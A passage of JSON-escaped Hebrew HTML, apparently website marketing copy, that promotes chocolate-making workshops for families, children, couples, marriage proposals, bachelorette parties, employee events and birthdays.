\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5.<\\/p><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 